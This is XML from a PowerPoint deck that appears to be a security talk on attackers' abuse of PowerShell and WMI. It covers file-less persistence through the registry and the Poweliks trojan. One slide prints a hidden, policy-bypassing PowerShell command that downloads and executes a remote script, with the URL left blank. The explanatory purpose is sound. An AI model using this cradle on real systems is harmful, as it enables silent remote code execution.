            <a:ext cx="9905998" cy="931502"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B711F968-9E8F-064D-8CD3-AB4168F13091}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="1083293"/>
            <a:ext cx="9731325" cy="5273212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2580838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C1EDC-7423-9C47-8A8B-A0F42E9D2DE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="367794"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="77"/>
              </a:rPr>
              <a:t>PowerShell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Content Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3763AADE-F61E-5247-8E26-68B137244C06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="591015" y="2249486"/>
            <a:ext cx="2837656" cy="3501435"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D75BD35-157B-EC4F-98E7-F41C5438B6FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3512633" y="1959554"/>
            <a:ext cx="7382109" cy="1179514"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>powershell.exe –w hidden –ep bypass –nop –c “IEX ((New-Object System.Net.Webclient).DownloadString(‘&lt;&gt;’))”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D37A6F4-AEA9-5449-B28C-5FBB855FCA5E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3665302" y="3139068"/>
            <a:ext cx="7382109" cy="2492298"/>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t>PowerShell.exe &lt;Switches&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke-Expression (IEX)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System.Net.WebClient</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71076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blinds(horizontal)">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blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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xEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="22"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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>powershell</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5430645" y="1427356"/>
            <a:ext cx="5514944" cy="4521809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>File-less Persistence</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Use of system components to maintain foothold after initial compromise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Two methods commonly abused by attackers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Windows Registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BE41D77-DF15-9C4F-A364-410B9110173A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352240" y="1839631"/>
            <a:ext cx="3568559" cy="3960813"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2928976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B6CE4-2B13-4715-B5B2-615A55922CA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143001" y="169550"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143F5361-68C0-4BF5-80C8-F1E7BF92B2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5430645" y="1427356"/>
            <a:ext cx="5514944" cy="4521809"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attackers abuse Run Key to store path of malicious binary to be executed on system restart.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In 2014 Trojan PoweLiks evolved and became complete registry based threat.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PoweLiks inserted the whole malware into the registry</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A790FBA3-7125-5A42-B3EB-AA1219C11466}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="959624" y="1820436"/>
            <a:ext cx="3886318" cy="3565602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3133904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Problem - Solution.potx" id="{618825C9-7A5B-4FD0-8173-05FBE0DDE387}" vid="{0970E009-9DDA-4822-A7D1-BB4C8516F0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0</TotalTime>
  <Words>3284</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>369</Paragraphs>
  <Slides>22</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Rockwell</vt:lpstr>
      <vt:lpstr>Tahoma</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Circuit</vt:lpstr>
      <vt:lpstr>Malicious PowerShell and WMI</vt:lpstr>
      <vt:lpstr>Me: Sunny Jamwal</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Malicious powershell and WMI</vt:lpstr>
      <vt:lpstr>powershell</vt:lpstr>
      <vt:lpstr>powershell</vt:lpstr>
      <vt:lpstr>PowerShell</vt:lpstr>
      <vt:lpstr>powershell</vt:lpstr>
      <vt:lpstr>powershell</vt:lpstr>
      <vt:lpstr>WMI</vt:lpstr>
      <vt:lpstr>WQL : WMI Query Language</vt:lpstr>
      <vt:lpstr>WMI</vt:lpstr>
      <vt:lpstr>WMI</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>WMI Eventing</vt:lpstr>
      <vt:lpstr>RECOMMENDATIONs</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SNY J</dc:creator>
  <cp:lastModifiedBy/>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-03-21T00:12:09Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-29T12:38:21Z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2018-08-20T22:55:44.5188046Z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